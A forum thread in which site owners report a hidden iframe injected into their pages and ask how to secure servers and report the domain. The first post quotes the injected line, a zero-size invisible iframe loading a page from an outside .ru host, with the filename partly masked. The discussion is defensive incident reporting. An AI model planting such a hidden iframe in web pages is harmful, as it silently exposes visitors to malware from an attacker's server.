A friend of mine found this line inserted into one of his files: <iframe name='StatPage' src='http://stelaartois.ru/xxxxx2.php' width=5 height=5 style='display:none'></iframe> I've x'ed out the filename to protect anyone here from getting the nasty bug by visiting the page themselves. I've suggested that he contact his host to try and tie up security from the server admins side. What else can be done? Can this domain get shutdown somehow? How do you report this? I see that others are have been violated by this guy since over a month ago after search google for this domain name and finding a thread in another forum.
I just logged in to ask the SAME question! A friend of mine found the exact same iframe inserted into the footer of his site - a custom PHP site hosted on a Linux box (I need to find out the distribution). He has a dedicated server, but it uses CPANEL. I will query him for more details about his setup - perhaps we can track down some similarities. Also, I think it happened around 13:30 EST on Thursday. Are there any decent security consultants here on DP?
I just tried to open this URL from my browser. It was blocked by my firewall saying its a spy site. Trying to find out more details...